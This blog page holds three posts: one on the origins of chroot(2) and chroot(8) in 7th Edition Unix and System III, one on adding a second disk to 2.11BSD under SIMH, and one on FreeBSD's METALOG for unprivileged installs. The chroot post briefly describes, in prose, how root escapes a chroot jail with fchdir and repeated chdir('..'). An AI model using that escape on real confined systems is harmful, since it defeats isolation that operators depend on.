20200627

Whither chroot?

Chroot Origins

This blog post will examine original artifacts to clear up some confusion about where chroot(2) and chroot(8) came from. The answer turns out to be simple, and the confusion was understandable. This shows the benefits of groups like TUHS in preserving Unix history, and how the kindness of Caldera and Lucent in releasing the historic Unix systems has helped in our understanding of the evolution of Unix. 

EDIT: After initially published, this was revised with more links to historic artifacts (inline and in the Appendix) and a screen shot of wikipedia. The Wikipedia chroot entry has since been updated.

tl;dr: chroot(2) came from 7th Edition Unix

chroot is system call 61 in 7th Edition Unix from Bell Labs. There is no chroot system call in 6th Edition or earlier. All derivatives of 7th edition have chroot(2) for at least 2 decades after the 7th Edition release in 1979.

What confusion?

Wikipedia has this in their entry for chroot:
which suggests that Bill Joy had something to do with its creation in the BSD world. Turns out it's confused because earlier literature on the topic is also confused.

What Sparked the Confusion?

Poul-Henning Kamp created the jail system for FreeBSD. This system takes a chroot environment to the next level in terms of security. As a security device, chroot was terrible because it's fairly easy to jailbreak out of a chroot if you are root. The short version is to open '/' to get a reference to it. Then chroot to some directory further down the tree. Then fchdir to the fd you saved from '/'. Now chdir(".."); a bunch of times. This will walk you back to the real root. Now chroot(".") and you are out. There's lots of variations on this theme, and dozens of papers in the literature and an almost infinite number of ways to leak references to FDs outside the jail...

One of the wonderful thing he did was to create an extensive set of docs and write a paper about the jail(2) facilities. In this paper Mr Kamp wrote:
[CHROOT]
Dr. Marshall Kirk Mckusick, private communication: ``According to the SCCS logs, the chroot call was added by Bill Joy on March 18, 1982 approximately 1.5 years before 4.2BSD was released. That was well before we had ftp servers of any sort (ftp did not show up in the source tree until January 1983). My best guess as to its purpose was to allow Bill to chroot into the /4.2BSD build directory and build a system using only the files, include files, etc contained in that tree. That was the only use of chroot that I remember from the early days.''
This paper was presented at the 2nd International System Administration and Networking Conference "SANE 2000" May 22-25, 2000 in Maastricht, The Netherlands and is published in the proceedings.

In 2000, the BSD SCCS tree was not publicly available. Dr McKusick had access to it as his role with the Computer Science Research Group (CSRG) that produce the 4BSD releases. This predated various litigation that suggested 32V had no copyright, and the Ancient Unix License that SCO granted for 32V, so it was necessarily private per agreements between AT&T and The University of California at Berkeley.

What Actually Happened in 1982?

What happened was a shuffling of the deck chairs. the commit log, made as root, from March 18, 1992 says:

rearrange for kirk

SCCS-vsn: 4.21
and introduces chroot to ufs_syscalls.c. If you read the diffs, it also introduced 'open', 'creat' and several others to this file. These system calls are known to be in the PDP-7 Unix implementation, so it's unlikely that they were really introduced in this commit. One problem that makes this harder to track is that SCCS didn't track renames, and ufs_syscalls.c was renamed to vfs_syscalls.c in 4.4BSD.  It's quite clearly in ufs_syscalls.c in 4.1cBSD:
/*
 * Change notion of root (``/'') directory.
 */
chroot()
{

        if (suser())
                chdirec(&u.u_rdir);
}
which is the identical code that was added by Bill Joy to ufs_syscalls.c. This was moved between 4.1BSD and 4.1c from sys4.c as part of the UFS work, and is different only by the BSD-stylistic change to add a blank line before the rest of the code if there's no local variables:
chroot()
{
        if (suser())
                chdirec(&u.u_rdir);
}
which, apart from the comment, is identical. Without beating a dead horse (too late?), this code is the same all the way back to 4BSD, 3BSD, 32V, 2.8BSD and finally to V7:
chroot()
{
        if (suser())
                chdirec(&u.u_rdir);
}
Since the code is identical from V7 all the way through 4.2BSD when it was, according to this footnote in the jail appeared, added. This is direct evidence that the footnote was in error.

So what was the rearrangement for Kirk? It was to move things around in the kernel to make the system calls more generic. It was code motion, nothing more, that Dr. McKusick was reporting in the private email to Mr Kamp. Now that the SCCS tree is public, via a translation to svn by John Baldwin, we can see the above.

chroot(2) Conclusions

Given that the code was moved around alot, it's an understandable mistake that Dr. McKusick made, which explains how the error could have happened. Given that the code is identical to v7 code, and it was somewhere in all the extant versions between the two (2BSD, 32V, 3BSD, 4.0BSD, 4.1BSD, 4.1cBSD and 4.2BSD), modulo a trivial whitespace change, we can conclude that Bill Joy did not introduce chroot into 4.2BSD, but instead it was moved around a lot from the original V7 code.

The FreeBSD chroot(2) manual has been updated to correct this mistake.

But what about chroot(8)?

But what about chroot(8)? There's some confusion about this as well. Until recently, chroot(8) said in FreeBSD:
HISTORY
     The chroot utility first appeared in 4.4BSD.
However, that too is in error (or was at least not precise enough). The error comes from the 4.4BSD release itself, which has identical text. In a sense this is not wrong. 4.4BSD was the first full release that chroot(8) appeared in in the Berkeley world. It's first appearance, though, in any BSD tape was in the interim 4.3BSD-Reno release.

But what about the AT&T world? There, more system calls are wrapped in programs to make it easier to use in shell scripts. It turns out that System III had a usr/src/cmd/chroot.c, which I won't quote here, that's a different chroot than appeared in BSD (the code looks completely different, apart from the elements that have to be the same...). So, the history has been corrected to read:
HISTORY
     The chroot utility first appeared in AT&T System III UNIX and
     4.3BSD-Reno.
to represent the first time in each of the two branches of Unix after the 7th Edition that it appeared.

And that concludes today's software archeology deep dive on chroot...

Appendix

Here's the evolution of the chroot(2) implementation, as see from TUHS. You'll need to search for 'chroot()' in each of these source files since the current TUHS web site doesn't allow line number links.
AT&T Unix: V7, 32V, System III, System V

I'd also like to plug the Historic Unix Repo, which also helps navigate and allows line numbers. Here's a link to the 4.1c version, for example. I recalled this after I'd found all the TUHS references, or I'd done all of them like that.

Adding a second disk with SIMH and 2.11BSD

Adding a Second Disk to a 2.11BSD system under SIMH

I recently followed some instructions to get 2.11BSD running under SIMH. That topic is covered elsewhere adequately. I may write something up in the future.

Before I started, my simh.init file looked like this (some items from install omitted)

SET CPU 11/93, 4M
SET CPU IDLE
SET RP  ENABLE
SET RP0 ENABLE, RP06, WRITEENABLED
ATTACH RP0 ./2.11BSD
SET XQ ENABLED
SET XQ TYPE=DEQNA
SET XQ MAC=08-00-2b-11-07-82
ATTACH XQ tap:tap0
; At the SimH promp type: unix
BOOT RP0

As part of my 2.11BSD patch level 0 restoration project (more on that later), I needed to add another disk I could install chroot images to test building. I'm running 2.11BSD pl 457 at the moment (I've not walked forward form the last snapshot tape). Fortunately, this version has disklabels, so I'm able to do this the easy way (though the old hard-coded stuff isn't too hard either).

First, I needed to add the raw disk in simh. I opted to have a second RP06 for simplicity. There's adequate space. My 'root image' for 2.11BSD I want to test is about 100MB, and the RP06 is 165MB. That should be adequate. I just needed to duplicate the RP0 lines:
SET RP1 ENABLE, RP06, WRITEENABLED
ATTACH RP1 ./extra-data
and restart simh (be sure to halt any running system before stopping simh). The important part here is to configure RP1 as writeable and an RP06. Otherwise, it will default to the smaller RP04. For me, that's too small.

Next, I had to check to see if there were /dev nodes for this device. The xp driver handles RP06 (and many other) disks.
3% root-> ls /dev/xp1*
/dev/xp1a  /dev/xp1c  /dev/xp1e  /dev/xp1g
/dev/xp1b  /dev/xp1d  /dev/xp1f  /dev/xp1h
so I'm in luck. The devices are there. Otherwise I'd have to run /dev/MAKEDEV in /dev to add them (or worse, do it by hand).

Next, I needed to label the disk. It's fortunate I'm running a new version because this was easy and I didn't have to rely on the hard-coded partitioning in the driver. However, even if I did, I'm using the whole disk so it wouldn't change my life much...
5% root-> disklabel -r -w xp1 rp06
which puts the standard rp06 label (from /etc/disktab) onto the drive. Chances are good that this will work on older versions. This gives the following label:
6% root-> disklabel -r xp1
# /dev/rxp1a:
type: unknown
disk: rp06
label:
flags: removeable badsect
bytes/sector: 512
sectors/track: 22
tracks/cylinder: 19
sectors/cylinder: 418
cylinders: 815
rpm: 3600
interleave: 1
trackskew: 0
cylinderskew: 0
headswitch: 0           # milliseconds
track-to-track seek: 0  # milliseconds
drivedata: 0

8 partitions:
#        size   offset    fstype   [fsize bsize]
  a:     9614        0   2.11BSD     1024  1024         # (Cyl.    0 - 22)
  b:     8778     9614      swap                        # (Cyl.   23 - 43)
  c:   153406    18392   2.11BSD     1024  1024         # (Cyl.   44 - 410)
  d:   168724   171798   2.11BSD     1024  1024         # (Cyl.  411 - 814*)
  e:   322130    18392   2.11BSD     1024  1024         # (Cyl.   44 - 814*)
  g:   171798        0   2.11BSD     1024  1024         # (Cyl.    0 - 410)
  h:   340522        0   2.11BSD     1024  1024         # (Cyl.    0 - 814*)
Note one difference from modern FreeBSD: rxp1a. 2.11BSD still has the character/block split. Also the 'standard' layout looks a bit odd to modern eyes. But there's 4 sets of partitions here: a,b,c,d for a system disk with / on a, swap on b and /usr on c. a,b,e (same but with a larger /usr on e). g and d to split the disk in half for data storage. And h for the whole disk. This mirrors the partitions from when things were hard coded in the device driver (yikes! glad we don't have that legacy anymore). In those days, you had to be as flexible as you could and leave it to the sysadmin to make wise choices with the limited flexibility they hard. These days, I'd label a scratch disk with just one partition (and call it 'a'). Since I was being lazy, I thought I'd leave this label in place. It's a quaint curiosity, but also instructive of history.

So, next, I have to put a filesystem on it. That's done with newfs:
8% root--> newfs /dev/xp1h
newfs: /dev/xp1h: not a character device
9% root--> newfs /dev/rxp1h
newfs: /sbin/mkfs -m 2 -n 209 -i 4096 -s 170261 /dev/rxp1h
isize = 42560
m/n = 2 209
which gives me a new filesystem. This is quite a bit less chatty that I'm used to on FreeBSD. Also, even after noticing, I forgot you have to newfs and fsck the raw device, not the block device.

Now time to mount it and add it to fstab. Old-school write ups say to fsck /dev/rxp1h here, but given simh doesn't simulate the unreliability often found in the hardware of the time, I've skipped that part.
10% root--> mkdir /scratch
11% root--> mount /dev/xp1h /scratch
12% root--> vi /etc/fstab
"/etc/fstab" 3 lines, 79 characters
/dev/xp0a       /       ufs     rw              1       1
/dev/xp0b       none    swap    sw              0       0
/dev/xp0c       /usr    ufs     rw              1       2
/dev/xp1h       /scratch ufs    rw              1       1
I've scrunched the vi session into the above: I just added the last line. And now I have a /scratch filesystem that will survive reboot.

And now I'm ready to create a tape with my putative 2.11BSD pl 0 system (really at the moment a 2.11BSD pl 195 system with pl0 sources). But that's for another day.

20200618

FreeBSD's METALOG: unprivileged installs

What is METALOG?

When you 'make installworld -DNO_ROOT DESTDIR=blah', the system will create a $DESTDIR/METALOG file. This file contains all the permission and modes for the files. Normally, installworld requires root permission. -DNO_ROOT instructs the build system to install them as the user and to note what permissions, etc in a METALOG.

How to use METALOG

Creating a UFS partition with no privs

If you have your own tooling around image creation, you can use the METALOG to supply the permissions and other filesystem metadata to that process. makefs can be used by a non-privileged user to a UFS partition image. Coupled with mkimg, you can create an entire bootable system image without needing root. Look at the -F flag to makefs(8) for how to use this functionality.

Package Base Use

METALOG is also used by the pkgbase initiative to slice up the system. Part of the metadata that's included is what package each of the installed files belongs to. This is all transparent when you do a 'make packages' to generate these packags.

Taring up  an installworld

If you are looking for a quick and dirty way to udpate a VM, you can often just create a tarball from the METALOG. Tar was enhanced a number of years ago to understand mtree files. The METALOG is one giant MTREE file. To create a tarball that's a copy of the image with all the right permissions:

cd $DESTDIR
tar cfJ base.txz @METALOG
This will create a xz compressed base.txz similar to what the release images create. This one tarball has everything (unlike the base.txz from the release build process), and is about 800MB.